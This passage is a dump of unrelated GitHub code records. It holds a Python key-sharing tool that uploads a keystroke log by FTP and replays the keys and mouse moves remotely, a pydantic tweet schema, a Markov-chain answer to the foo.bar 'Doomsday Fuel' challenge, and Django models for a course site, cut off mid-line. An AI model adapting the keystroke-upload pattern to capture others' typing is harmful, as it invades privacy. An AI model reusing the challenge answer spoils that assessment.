Addressoflogfileonserver)\n #fs.close()\n return 'done'\n \n except:\n print(\"An exception was thrown. Please Check whether config.txt file is in directory with the correct information.\")\n answer = input('Do you like to continue: (y/n)')\n if answer == 'n' or answer == 'N':\n print('Closing the App..')\n return 'close'\n \n else:\n print(\"Restarting the App..\")\n return 'restart'\n \n \n\ndef startapp():\n\n #config \n configresult = config() \n if configresult == 'done':\n \n #get input\n answer = input('Hello there. Are you client or server?')\n if answer == 'server' or answer == 'Server':\n print('Server is running. Go open JustShareKeys.py to start sharing your keys.')\n #os.system('JustShareKeys.py')\n runserver()\n \n elif answer == 'client' or answer == 'Client':\n runclient()\n \n elif configresult == 'restart':\n startapp()\n \n elif configresult == 'close':\n pass\n \n \n \n\ndef runserver():\n global status\n global oldmsg\n global oldid\n global theid\n global FTPaddress \n global FTPusername\n global FTPpassword\n global FTPdestinationdirectoryname\n global Addressoflogfileonserver\n\n # f = open(\"log.txt\", \"r\")\n # lines = f.readlines()\n # lineid = lines[0]\n # linekey = lines[1]\n\n # theid = lineid\n # if theid != oldid:\n # oldid = theid\n \n #revert the try\n try:\n\n while status == True:\n f = open(\"log.txt\", \"r\")\n lines = f.readlines()\n lineid = lines[0]\n linekey = lines[1]\n theid = lineid\n # print('The key is: ' + linekey)\n # print('The id is: ' + lineid)\n \n # if theid != oldid:\n # oldid = theid\n \n if lineid != oldid and \"Num\" not in linekey :\n \n \n ftp = ftplib.FTP(FTPaddress)\n \n ftp.login(FTPusername,FTPpassword)\n \n #print(ftp.pwd())\n ftp.cwd('public_html')\n #print(ftp.pwd())\n \n ftp.cwd(FTPdestinationdirectoryname)\n ##print(ftp.pwd())\n \n print('The key pressed is: ' + linekey)\n oldid = lineid\n myfile = open(\"log.txt\",'rb')\n ftp.storlines('STOR ' + filename , myfile)\n \n elif \"Num\" in linekey and lineid != oldid: \n ftp = ftplib.FTP(FTPaddress)\n \n \n ftp.login(FTPusername,FTPpassword)\n \n #print(ftp.pwd())\n ftp.cwd('public_html')\n #print(ftp.pwd())\n ftp.cwd(FTPdestinationdirectoryname)\n ##print(ftp.pwd())\n \n print('The key pressed is: ' + linekey)\n oldid = theid\n f.close()\n myfile = open(\"log.txt\",'rb')\n ftp.storlines('STOR ' + filename , myfile)\n \n print('Numlock was pressed. The operation is on pause!')\n answer = input('Would you like to proceed the connection (answer: y/n)?')\n if answer == 'n' or answer == 'N':\n print('You are now disconnected. To start the server rerun the app.')\n status = False\n \n \n f.close()\n time.sleep(0.001)\n \n #revert \n except:\n time.sleep(0.001)\n \n runserver()\n\n #print(\"An exception occurred\")\n #IndexError()\n\n\n\n\ndef runclient():\n global status\n global oldmsg\n global oldid\n global theid\n global downloadedfilepath\n try:\n while status == True:\n downloadedfilepath = wget.download(Addressoflogfileonserver)\n f = open(downloadedfilepath, \"r\")\n lines = f.readlines()\n lineid = lines[0]\n linekey = lines[1]\n linemouseposition = lines[2]\n theid = lineid\n\n\n f.close()\n os.remove(downloadedfilepath)\n if lineid != oldid:\n #keyboard and mouse click if and if\n print(linekey)\n oldid = lineid\n\n if(\"pace\" in str(linekey)):\n print('Now Space should be pressed!')\n keyboard.send(\"space\")\n\n elif(\"nter\" in str(linekey)):\n print('Now Enter should be pressed!')\n keyboard.send(\"enter\")\n\n elif(\"MB\" in str(linekey)):\n print('Now LMB should be pressed!')\n mouse.click(button='left')\n\n elif(\"sc\" in str(linekey)):\n print('Now Esc should be pressed!')\n keyboard.send(\"escape\")\n\n elif(\"hift\" in str(linekey)):\n\n positionarr = linemouseposition.split(' ')\n print('Shift was pressed. Mouse moves to: ' + 'X = ' + positionarr[0] + ' , Y = ' + positionarr[1] )\n autopy.mouse.smooth_move(int(positionarr[0]),int(positionarr[1])) #smooth move is slow\n #autopy.mouse.move(int(positionarr[0]),int(positionarr[1]))\n\n elif(\"eft\" in str(linekey)):\n print('Now Left arrow button should be pressed!')\n keyboard.send(\"left\")\n\n elif(\"ight\" in str(linekey)):\n print('Now Right arrow button should be pressed!')\n keyboard.send(\"right\")\n\n#never pause the client you should only close the tab to end\n elif(\"umLock\" in str(linekey)):\n print('host paused/unpaused the connection.')\n## answer = input('Would you like to proceed the connection (answer: y/n)?')\n## if answer == 'n' or answer == 'N':\n## print('You are now disconnected. To start the client rerun the app.')\n## status = False\n except:\n try:\n f.close()\n os.remove(downloadedfilepath)\n time.sleep(0.001)\n runclient()\n\n except FileNotFoundError:\n time.sleep(0.001)\n runclient()\n\n except:\n time.sleep(0.001)\n runclient()\n\n\n\n\n\n#program\n\nstartapp()\n\n","repo_name":"farzammadani/JustShareKeys","sub_path":"Connect.py","file_name":"Connect.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74473444327","text":"from pydantic import BaseModel, Field\nfrom typing import Optional\nfrom datetime import date\n\n\nclass Tweet(BaseModel):\n\n id: Optional[int] = None\n body: str = Field(min_length=1, max_length=140)\n comments_count: Optional[int] = 0\n created_time: date\n user_id: int\n\n class Config:\n schema_extra = {\n \"example\":{\n \"body\":\"Put here your tweet\",\n \"created_time\":\"2023-03-10 10:10:10\",\n \"user_id\": 0\n }\n }","repo_name":"efdree/py-api-tweetable","sub_path":"schemas/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14043859130","text":"#MARKOV CHAINS and absorbing states - theory\nfrom fractions import Fraction\n\ndef get_transition_matrix(m,absorbing,non_absorbing):\n p = [] #in order to use MARKOV CHAINS it's important to have separated absorbing states from non-absorbing ones\n row = absorbing + non_absorbing\n\n for i, rowNumber in enumerate(absorbing):\n p.append(m[rowNumber])\n p[i][i] = 1\n\n for nonAbsorbingI in non_absorbing:\n orderedRow = []\n for orderI in row:\n orderedRow.append(m[nonAbsorbingI][orderI])\n fractionRow = []\n for col in orderedRow:\n fractionRow.append(col/ float(sum(orderedRow)))\n p.append(fractionRow)\n\n return p\n\ndef extract_matrices(m,t,s):\n q,r = [],[]\n for row in range(s, s+t):\n q.append(m[row][s:])\n r.append(m[row][:s])\n\n return q,r\n\ndef get_submatrix(m,i,j):\n sub = []\n for x in m[:i]+m[i+1:]:\n l = []\n for y in x[:j]+x[j+1:]:\n l.append(y)\n sub.append(l)\n return sub\n\ndef get_determinant(q):\n l = len(q)\n if l == 2:\n return q[0][0]*q[1][1] - q[0][1]*q[1][0]\n\n det = 0\n for i in range(l):\n det += ((-1)**i) * q[0][i] * get_determinant(get_submatrix(q,0,i))\n\n return det\n\ndef get_transpose(m):\n mt = []\n r = len(m)\n if r > 0:\n c = len(m[0])\n for j in range(c):\n l = []\n for i in range(r):\n l.append(m[i][j])\n mt.append(l)\n\n return mt\n\ndef get_inverse(q):\n det = get_determinant(q)\n\n if len(q) == 2:\n return [[q[1][1]/det, -1*q[0][1]/det],\n [-1*q[1][0]/det, q[0][0]/det]]\n\n cofactors = []\n for r in range(len(q)):\n cofactorRow = []\n for c in range(len(m)):\n cofactorRow.append(((-1)**(r+c)) * get_determinant(get_submatrix(q,r,c)))\n cofactors.append(cofactorRow)\n cofactors = get_transpose(cofactors)\n for r in range(len(cofactors)):\n for c in range(len(cofactors)):\n cofactors[r][c] /= det\n return cofactors\n\ndef multiply_matrices(n,r):\n prod = []\n x1,x2 = len(n),len(r)\n\n if x1>0 and x2>0 and len(n[0])==x2:\n x3 = len(r[0])\n for i in range(x1):\n tmp = []\n for j in range(x3):\n tot = 0\n for k in range(x2):\n tot += n[i][k]*r[k][j]\n tmp.append(tot)\n prod.append(tmp)\n\n return prod\n\ndef get_fundamental_matrix(q,t):\n for i in range(t):\n for j in range(t):\n k = 0\n if i == j:\n k = 1\n q[i][j] = k - q[i][j]\n # Q -> Id_t - Q\n \n inv = get_inverse(q) # Q^-1\n \n return inv\n\ndef get_mcm(a,b):\n m = max([a,b])\n while m % a != 0 or m % b != 0:\n m += 1\n return m\n\ndef get_result(m,s):\n num = []\n den = []\n res = [0] * (s+1)\n mcm = 1\n for i in range(s):\n x = Fraction(m[i]).limit_denominator()\n num.append(x.numerator)\n den.append(x.denominator)\n mcm = get_mcm(mcm,x.denominator)\n\n res[s] = mcm\n\n for i in range(s):\n res[i] = int(mcm/den[i]) * num[i]\n\n return res\n\ndef solution(m):\n l = len(m)\n absorbing_order,non_absorbing_order = [],[]\n\n for i, row in enumerate(m):\n if(max(row) == 0):\n absorbing_order.append(i)\n else:\n non_absorbing_order.append(i)\n \n if len(absorbing_order) == 1:\n return [1, 1]\n\n s = len(absorbing_order)\n t = l - s\n transition_matrix = get_transition_matrix(m,absorbing_order,non_absorbing_order)\n #extract Q and R\n # \n # TM = | Q R | Q is t x t, R is t x s\n # | 0 ID |\n q, r = extract_matrices(transition_matrix,t,s)\n #compute N = (Id - Q)^-1\n n = get_fundamental_matrix(q,t)\n #finally compute M = N R, M_ij contains prob of being absorbed in state j after starting from state i\n # we do focus only on i=0! column M_0j\n\n m = multiply_matrices(n,r) #np.dot(n,r)\n\n #equalize m denominators before and converting to result\n res = get_result(m[0],s)\n return res\n\nm = [\n [0,1,0,0,0,1], # s0, the initial state, goes to s1 and s5 with equal probability\n [4,0,0,3,2,0], # s1 can become s0, s3, or s4, but with different probabilities\n [0,0,0,0,0,0], # s2 is terminal, and unreachable (never observed in practice)\n [0,0,0,0,0,0], # s3 is terminal\n [0,0,0,0,0,0], # s4 is terminal\n [0,0,0,0,0,0], # s5 is terminal\n]\ns = [[0, 2, 1, 0, 0], [0, 0, 0, 3, 4], [0, 0, 0, 0, 0], [0, 0, 0, 0,0], [0, 0, 0, 0, 0]]\nprint(solution(s))\nprint(solution(m))","repo_name":"matteosz/foo.bar","sub_path":"Level 3/Doomsday Fuel/main_no_np.py","file_name":"main_no_np.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86297330970","text":"from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.utils.safestring import mark_safe\nfrom django.db import models\nimport hashlib\n\n\nclass CourseCategory(models.Model):\n \"\"\"课程大类, e.g 前端 后端...\"\"\"\n name = models.CharField(max_length=64, unique=True)\n\n def __str__(self):\n return \"%s\" % self.name\n\n class Meta:\n verbose_name = \"课程大类\"\n verbose_name_plural = \"课程大类\"\n\n\nclass CourseSubCategory(models.Model):\n \"\"\"课程子类, e.g python linux \"\"\"\n category = models.ForeignKey(\"CourseCategory\")\n name = models.CharField(max_length=64, unique=True)\n\n def __str__(self):\n return \"%s\" % self.name\n\n class Meta:\n verbose_name = \"课程子类\"\n verbose_name_plural = \"课程子类\"\n\n\nclass DegreeCourse(models.Model):\n \"\"\"学位课程\"\"\"\n name = models.CharField(max_length=128, unique=True)\n course_img = models.CharField(max_length=255, verbose_name=\"缩略图\")\n brief = models.TextField(verbose_name=\"学位课程简介\", )\n total_scholarship = models.PositiveIntegerField(verbose_name=\"总奖学金(贝里)\", default=40000)\n mentor_compensation_bonus = models.PositiveIntegerField(verbose_name=\"本课程的导师辅导费用(贝里)\", default=15000)\n # 用于GenericForeignKey反向查询, 不会生成表字段,切勿删除\n coupon = GenericRelation(\"Coupon\")\n # 为了计算学位奖学金\n period = models.PositiveIntegerField(verbose_name=\"建议学习周期(days)\", default=150)\n prerequisite = models.TextField(verbose_name=\"课程先修要求\", max_length=1024)\n teachers = models.ManyToManyField(\"Teacher\", verbose_name=\"课程讲师\")\n # 用于GenericForeignKey反向查询,不会生成表字段,切勿删除\n degreecourse_price_policy = GenericRelation(\"PricePolicy\")\n\n def __str__(self):\n return self.name\n\n\nclass Scholarship(models.Model):\n \"\"\"学位课程奖学金\"\"\"\n degree_course = models.ForeignKey(\"DegreeCourse\")\n time_percent = models.PositiveSmallIntegerField(verbose_name=\"奖励档位(时间百分比)\", help_text=\"只填百分值,如80,代表80%\")\n value = models.PositiveIntegerField(verbose_name=\"奖学金数额\")\n\n def __str__(self):\n return \"%s:%s\" % (self.degree_course, self.value)\n\n\nclass Course(models.Model):\n \"\"\"课程\"\"\"\n name = models.CharField(max_length=128, unique=True)\n course_img = models.CharField(max_length=255)\n sub_category = models.ForeignKey(\"CourseSubCategory\")\n course_type_choices = ((0, '付费'), (1, 'VIP专享'), (2, '学位课程'))\n course_type = models.SmallIntegerField(choices=course_type_choices)\n degree_course = models.ForeignKey(\"DegreeCourse\", blank=True, null=True, help_text=\"若是学位课程,此处关联学位表\")\n brief = models.TextField(verbose_name=\"课程概述\", max_length=2048)\n level_choices = ((0, '初级'), (1, '中级'), (2, '高级'))\n level = models.SmallIntegerField(choices=level_choices, default=1)\n pub_date = models.DateField(verbose_name=\"发布日期\", blank=True, null=True)\n period = models.PositiveIntegerField(verbose_name=\"建议学习周期(days)\", default=7)\n order = models.IntegerField(\"课程顺序\", help_text=\"从上一个课程数字往后排\")\n attachment_path = models.CharField(max_length=128, verbose_name=\"课件路径\", blank=True, null=True)\n status_choices = ((0, '上线'), (1, '下线'), (2, '预上线'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n template_id = models.SmallIntegerField(\"前端模板id\", default=1)\n coupon = GenericRelation(\"Coupon\")\n # 用于GenericForeignKey反向查询,不会生成表字段,切勿删除\n price_policy = GenericRelation(\"PricePolicy\")\n\n def __str__(self):\n return \"%s(%s)\" % (self.name, self.get_course_type_display())\n\n def save(self, *args, **kwargs):\n if self.course_type == 2:\n if not self.degree_course:\n raise ValueError(\"学位课程必须关联对应的学位表\")\n super(Course, self).save(*args, **kwargs)\n\n\nclass CourseDetail(models.Model):\n \"\"\"课程详情页内容\"\"\"\n course = models.OneToOneField(\"Course\")\n hours = models.IntegerField(\"课时\")\n course_slogan = models.CharField(max_length=125, blank=True, null=True)\n video_brief_link = models.CharField(verbose_name='课程介绍', max_length=255, blank=True, null=True)\n why_study = models.TextField(verbose_name=\"为什么学习这门课程\")\n what_to_study_brief = models.TextField(verbose_name=\"我将学到哪些内容\")\n career_improvement = models.TextField(verbose_name=\"此项目如何有助于我的职业生涯\")\n prerequisite = models.TextField(verbose_name=\"课程先修要求\", max_length=1024)\n recommend_courses = models.ManyToManyField(\"Course\", related_name=\"recommend_by\", blank=True)\n teachers = models.ManyToManyField(\"Teacher\", verbose_name=\"课程讲师\")\n\n def __str__(self):\n return \"%s\" % self.course\n\n\nclass OftenAskedQuestion(models.Model):\n \"\"\"常见问题\"\"\"\n content_type = models.ForeignKey(ContentType,\n limit_choices_to={'model__contains': 'course'}) # 关联course or degree_course\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n question = models.CharField(max_length=255)\n answer = models.TextField(max_length=1024)\n\n def __str__(self):\n return \"%s-%s\" % (self.content_object, self.question)\n\n class Meta:\n unique_together = ('content_type', 'object_id', 'question')\n\n\nclass CourseOutline(models.Model):\n \"\"\"课程大纲\"\"\"\n course_detail = models.ForeignKey(\"CourseDetail\")\n title = models.CharField(max_length=128)\n # 前端显示顺序\n order = models.PositiveSmallIntegerField(default=1)\n\n content = models.TextField(\"内容\", max_length=2048)\n\n def __str__(self):\n return \"%s\" % self.title\n\n class Meta:\n unique_together = ('course_detail', 'title')\n\n\nclass CourseChapter(models.Model):\n \"\"\"课程章节\"\"\"\n course = models.ForeignKey(\"Course\", related_name='coursechapters')\n chapter = models.SmallIntegerField(verbose_name=\"第几章\", default=1)\n name = models.CharField(max_length=128)\n summary = models.TextField(verbose_name=\"章节介绍\", blank=True, null=True)\n pub_date = models.DateField(verbose_name=\"发布日期\", auto_now_add=True)\n\n class Meta:\n unique_together = (\"course\", 'chapter')\n\n def __str__(self):\n return \"%s:(第%s章)%s\" % (self.course, self.chapter, self.name)\n\n\nclass Teacher(models.Model):\n \"\"\"讲师、导师表\"\"\"\n name = models.CharField(max_length=32)\n role_choices = ((0, '讲师'), (1, '导师'))\n role = models.SmallIntegerField(choices=role_choices, default=0)\n title = models.CharField(max_length=64, verbose_name=\"职位、职称\")\n signature = models.CharField(max_length=255, help_text=\"导师签名\", blank=True, null=True)\n image = models.CharField(max_length=128)\n brief = models.TextField(max_length=1024)\n\n def __str__(self):\n return self.name\n\n\nclass PricePolicy(models.Model):\n \"\"\"价格与有课程效期表\"\"\"\n content_type = models.ForeignKey(ContentType) # 关联course or degree_course\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n # course = models.ForeignKey(\"Course\")\n valid_period_choices = ((1, '1天'), (3, '3天'),\n (7, '1周'), (14, '2周'),\n (30, '1个月'),\n (60, '2个月'),\n (90, '3个月'),\n (180, '6个月'), (210, '12个月'),\n (540, '18个月'), (720, '24个月'),\n )\n valid_period = models.SmallIntegerField(choices=valid_period_choices)\n price = models.FloatField()\n\n class Meta:\n unique_together = (\"content_type\", 'object_id', \"valid_period\")\n\n def __str__(self):\n return \"%s(%s)%s\" % (self.content_object, self.get_valid_period_display(), self.price)\n\n\nclass CourseSection(models.Model):\n \"\"\"课时目录\"\"\"\n chapter = models.ForeignKey(\"CourseChapter\", related_name='coursesections')\n name = models.CharField(max_length=128)\n order = models.PositiveSmallIntegerField(verbose_name=\"课时排序\", help_text=\"建议每个课时之间空1至2个值,以备后续插入课时\")\n section_type_choices = ((0, '文档'), (1, '练习'), (2, '视频'))\n section_type = models.SmallIntegerField(default=2, choices=section_type_choices)\n section_link = models.CharField(max_length=255, blank=True, null=True, help_text=\"若是video,填vid,若是文档,填link\")\n video_time = models.CharField(verbose_name=\"视频时长\", blank=True, null=True, max_length=32) # 仅在前端展示使用\n pub_date = models.DateTimeField(verbose_name=\"发布时间\", auto_now_add=True)\n free_trail = models.BooleanField(\"是否可试看\", default=False)\n\n class Meta:\n unique_together = ('chapter', 'section_link')\n\n def __str__(self):\n return \"%s-%s\" % (self.chapter, self.name)\n\n\nclass CourseReview(models.Model):\n \"\"\"课程评价\"\"\"\n enrolled_course = models.OneToOneField(\"EnrolledCourse\")\n about_teacher = models.FloatField(default=0, verbose_name=\"讲师讲解是否清晰\")\n about_video = models.FloatField(default=0, verbose_name=\"内容实用\")\n about_course = models.FloatField(default=0, verbose_name=\"课程内容通俗易懂\")\n review = models.TextField(max_length=1024, verbose_name=\"评价\")\n disagree_number = models.IntegerField(default=0, verbose_name=\"踩\")\n agree_number = models.IntegerField(default=0, verbose_name=\"赞同数\")\n tags = models.ManyToManyField(\"Tags\", blank=True, verbose_name=\"标签\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"评价日期\")\n is_recommend = models.BooleanField(\"热评推荐\", default=False)\n hide = models.BooleanField(\"不在前端页面显示此条评价\", default=False)\n\n def __str__(self):\n return \"%s-%s\" % (self.enrolled_course.course, self.review)\n\n\nclass DegreeCourseReview(models.Model):\n \"\"\"学位课程评价\n 为了以后可以定制单独的评价内容,所以不与普通课程的评价混在一起,单独建表\n \"\"\"\n enrolled_course = models.ForeignKey(\"EnrolledDegreeCourse\")\n course = models.ForeignKey(\"Course\", verbose_name=\"评价学位模块\", blank=True, null=True,\n help_text=\"不填写即代表评价整个学位课程\", limit_choices_to={'course_type': 2})\n about_teacher = models.FloatField(default=0, verbose_name=\"讲师讲解是否清晰\")\n about_video = models.FloatField(default=0, verbose_name=\"视频质量\")\n about_course = models.FloatField(default=0, verbose_name=\"课程\")\n review = models.TextField(max_length=1024, verbose_name=\"评价\")\n disagree_number = models.IntegerField(default=0, verbose_name=\"踩\")\n agree_number = models.IntegerField(default=0, verbose_name=\"赞同数\")\n tags = models.ManyToManyField(\"Tags\", blank=True, verbose_name=\"标签\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"评价日期\")\n is_recommend = models.BooleanField(\"热评推荐\", default=False)\n hide = models.BooleanField(\"不在前端页面显示此条评价\", default=False)\n\n def __str__(self):\n return \"%s-%s\" % (self.enrolled_course, self.review)\n\n\nclass Homework(models.Model):\n chapter = models.ForeignKey(\"CourseChapter\")\n title = models.CharField(max_length=128, verbose_name=\"作业���目\")\n order = models.PositiveSmallIntegerField(\"作业顺序\", help_text=\"同一课程的每个作业之前的order值间隔1-2个数\")\n homework_type_choices = ((0, '作业'), (1, '模块通关考核'))\n homework_type = models.SmallIntegerField(choices=homework_type_choices, default=0)\n requirement = models.TextField(max_length=1024, verbose_name=\"作业需求\")\n threshold = models.TextField(max_length=1024, verbose_name=\"踩分点\")\n recommend_period = models.PositiveSmallIntegerField(\"推荐完成周期(天)\", default=7)\n scholarship_value = models.PositiveSmallIntegerField(\"为该作业分配的奖学金(贝里)\")\n note = models.TextField(blank=True, null=True)\n enabled = models.BooleanField(default=True, help_text=\"本作业如果后期不需要了,不想让学员看到,可以设置为False\")\n\n class Meta:\n unique_together = (\"chapter\", \"title\")\n\n def __str__(self):\n return \"%s - %s\" % (self.chapter, self.title)\n\n\nclass ArticleSource(models.Model):\n \"\"\"文章来源\"\"\"\n name = models.CharField(max_length=64, unique=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(models.Model):\n \"\"\"文章资讯\"\"\"\n title = models.CharField(max_length=255, unique=True, db_index=True, verbose_name=\"标题\")\n source = models.ForeignKey(\"ArticleSource\", verbose_name=\"来源\")\n article_type_choices = ((0, '资讯'), (1, '视频'))\n article_type = models.SmallIntegerField(choices=article_type_choices, default=0)\n brief = models.TextField(max_length=512, verbose_name=\"摘要\")\n head_img = models.CharField(max_length=255)\n content = models.TextField(verbose_name=\"文章正文\")\n pub_date = models.DateTimeField(verbose_name=\"上架日期\")\n offline_date = models.DateTimeField(verbose_name=\"下架日期\")\n status_choices = ((0, '在线'), (1, '下线'))\n status = models.SmallIntegerField(choices=status_choices, default=0, verbose_name=\"状态\")\n order = models.SmallIntegerField(default=0, verbose_name=\"权重\", help_text=\"文章想置顶,可以把数字调大,不要超过1000\")\n vid = models.CharField(max_length=128, verbose_name=\"视频VID\", help_text=\"文章类型是视频, 则需要添加视频VID\", blank=True, null=True)\n comment_num = models.SmallIntegerField(default=0, verbose_name=\"评论数\")\n agree_num = models.SmallIntegerField(default=0, verbose_name=\"点赞数\")\n view_num = models.SmallIntegerField(default=0, verbose_name=\"观看数\")\n collect_num = models.SmallIntegerField(default=0, verbose_name=\"收藏数\")\n\n tags = models.ManyToManyField(\"Tags\", blank=True, verbose_name=\"标签\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"创建日期\")\n\n position_choices = ((0, '信息流'), (1, 'banner大图'), (2, 'banner小图'))\n position = models.SmallIntegerField(choices=position_choices, default=0, verbose_name=\"位置\")\n comment = GenericRelation(\"Comment\") # 用于GenericForeignKey反向查询, 不会生成表字段,切勿删除,如有疑问请联系老村长\n\n def __str__(self):\n return \"%s-%s\" % (self.source, self.title)\n\n\nclass Collection(models.Model):\n \"\"\"收藏\"\"\"\n content_type = models.ForeignKey(ContentType)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n account = models.ForeignKey(\"Account\")\n date = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = ('content_type', 'object_id', 'account')\n\n\nclass Comment(models.Model):\n \"\"\"通用的评论表\"\"\"\n content_type = models.ForeignKey(ContentType, blank=True, null=True, verbose_name=\"类型\")\n object_id = models.PositiveIntegerField(blank=True, null=True)\n content_object = GenericForeignKey('content_type', 'object_id')\n\n p_node = models.ForeignKey(\"self\", blank=True, null=True, verbose_name=\"父级评论\")\n content = models.TextField(max_length=1024)\n account = models.ForeignKey(\"Account\", verbose_name=\"会员名\")\n disagree_number = models.IntegerField(default=0, verbose_name=\"踩\")\n agree_number = models.IntegerField(default=0, verbose_name=\"赞同数\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.content\n\n\nclass ScoreRule(models.Model):\n \"\"\"积分规则\"\"\"\n score_rule_choices = (\n (0, '未按时交作业'),\n (1, '未及时批改作业'),\n (2, '作业成绩'),\n (3, '未在规定时间内对学员进行跟进'),\n (4, '未在规定时间内回复学员问题'),\n (5, '收到学员投诉'),\n (6, '导师相关'),\n (7, '学位奖学金'),\n )\n rule = models.SmallIntegerField(choices=score_rule_choices, verbose_name=\"积分规则\")\n score_type_choices = ((0, '奖励'), (1, '惩罚'), (2, '初始分配'))\n score_type = models.SmallIntegerField(choices=score_type_choices, verbose_name=\"奖惩\", default=0)\n score = models.IntegerField(help_text=\"扣分数与贝里相等,若为0则代表规则的值可以从别处取得\")\n # maturity_days = models.IntegerField(\"成熟周期\", help_text=\"自纪录创建时开始计算\")\n memo = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return \"%s-%s:%s\" % (self.get_rule_display(), self.get_score_type_display(), self.score)\n\n class Meta:\n unique_together = ('rule', 'score_type')\n\n\nclass ScoreRecord(models.Model):\n \"\"\"积分奖惩记录\"\"\"\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(blank=True, null=True)\n content_object = GenericForeignKey('content_type', 'object_id')\n\n degree_course = models.ForeignKey(\"DegreeCourse\", blank=True, null=True, verbose_name=\"关联学位课程\")\n score_rule = models.ForeignKey(\"ScoreRule\", verbose_name=\"关联规则\")\n account = models.ForeignKey(\"Account\", verbose_name=\"被执行人\")\n score = models.IntegerField(verbose_name=\"金额(贝里)\") # 这里单独有一个字段存积分而不是从score_rule里引用的原因是考虑到如果引用的话,\n received_score = models.IntegerField(\"实际到账金额贝里)\", help_text=\"仅奖励用\", default=0)\n balance = models.PositiveIntegerField(verbose_name=\"奖金余额(贝里)\")\n # 一旦score_rule里的积分有变更,那么所有用户的历史积分也会被影响\n maturity_date = models.DateField(\"成熟日期(可提现日期)\")\n applied = models.BooleanField(default=False, help_text=\"奖赏纪录是否已被执行\", verbose_name=\"是否已被执行\")\n applied_date = models.DateTimeField(blank=True, null=True, verbose_name=\"事件生效日期\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"事件触发日期\")\n memo = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return \"%s-%s - %s - %s 奖金余额:%s\" % (self.id, self.score_rule, self.account, self.score, self.balance)\n\n # class Meta: 导师的更换 关联的enrolled_degree_course 是可以有多条惩罚记录的,不能unique_together\n # unique_together = ('content_type', 'object_id', 'account', 'score_rule')\n\n\nclass CourseSchedule(models.Model):\n \"\"\"课程进度计划表,针对学位课程,每开通一个模块,就为这个学员生成这个模块的推荐学习计划表,后面的奖惩均按此表进行\"\"\"\n study_record = models.ForeignKey(\"StudyRecord\")\n homework = models.ForeignKey(\"Homework\")\n recommend_date = models.DateField(\"推荐交作业日期\")\n\n def __str__(self):\n return \"%s - %s - %s \" % (self.study_record, self.homework, self.recommend_date)\n\n class Meta:\n unique_together = ('study_record', 'homework')\n\n\nclass EnrolledCourse(models.Model):\n \"\"\"已报名课程,不包括学位课程\"\"\"\n account = models.ForeignKey(\"Account\")\n course = models.ForeignKey(\"Course\", limit_choices_to=~Q(course_type=2))\n enrolled_date = models.DateTimeField(auto_now_add=True)\n valid_begin_date = models.DateField(verbose_name=\"有效期开始自\")\n valid_end_date = models.DateField(verbose_name=\"有效期结束至\")\n status_choices = ((0, '已开通'), (1, '已过期'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n order_detail = models.OneToOneField(\"OrderDetail\") # 使订单购买后支持 课程评价\n\n # order = models.ForeignKey(\"Order\",blank=True,null=True)\n\n def __str__(self):\n return \"%s:%s\" % (self.account, self.course)\n\n # class Meta: 一个课程到期了,可以重新购买,所以不能联合唯一\n # unique_together = ('account', 'course')\n\n\nclass DegreeRegistrationForm(models.Model):\n \"\"\"学位课程报名表\"\"\"\n enrolled_degree = models.OneToOneField(\"EnrolledDegreeCourse\")\n current_company = models.CharField(max_length=64, )\n current_position = models.CharField(max_length=64, )\n current_salary = models.IntegerField()\n work_experience_choices = ((0, \"应届生\"),\n (1, \"1年\"),\n (2, \"2年\"),\n (3, \"3年\"),\n (4, \"4年\"),\n (5, \"5年\"),\n (6, \"6年\"),\n (7, \"7年\"),\n (8, \"8年\"),\n (9, \"9年\"),\n (10, \"10年\"),\n (11, \"超过10年\"),\n )\n work_experience = models.IntegerField()\n open_module = models.BooleanField(\"是否开通第1模块\", default=True)\n stu_specified_mentor = models.CharField(\"学员自行指定的导师名\", max_length=32, blank=True, null=True)\n study_plan_choices = ((0, \"1-2小时/天\"),\n (1, \"2-3小时/天\"),\n (2, \"3-5小时/天\"),\n (3, \"5小时+/天\"),\n )\n study_plan = models.SmallIntegerField(choices=study_plan_choices, default=1)\n why_take_this_course = models.TextField(\"报此课程原因\", max_length=1024)\n why_choose_us = models.TextField(\"为何选路飞\", max_length=1024)\n your_expectation = models.TextField(\"你的期待\", max_length=1024)\n memo = models.CharField(max_length=255, blank=True, null=True)\n\n def __str__(self):\n return \"%s\" % self.enrolled_degree\n\n\nclass EnrolledDegreeCourse(models.Model):\n \"\"\"已报名的学位课程\"\"\"\n account = models.ForeignKey(\"Account\")\n degree_course = models.ForeignKey(\"DegreeCourse\")\n enrolled_date = models.DateTimeField(auto_now_add=True)\n valid_begin_date = models.DateField(verbose_name=\"有效期开始自\", blank=True, null=True) # 开通第一个模块时,再添加课程有效期,2年\n valid_end_date = models.DateField(verbose_name=\"有效期结束至\", blank=True, null=True)\n status_choices = (\n (0, '在学中'),\n (1, '休学中'),\n (2, '已毕业'),\n (3, '超时结业'),\n (4, '未开始'),\n # (3, '其它'),\n )\n study_status = models.SmallIntegerField(choices=status_choices, default=0)\n mentor = models.ForeignKey(\"Account\", verbose_name=\"导师\", related_name='my_students',\n blank=True, null=True, limit_choices_to={'role': 1})\n mentor_fee_balance = 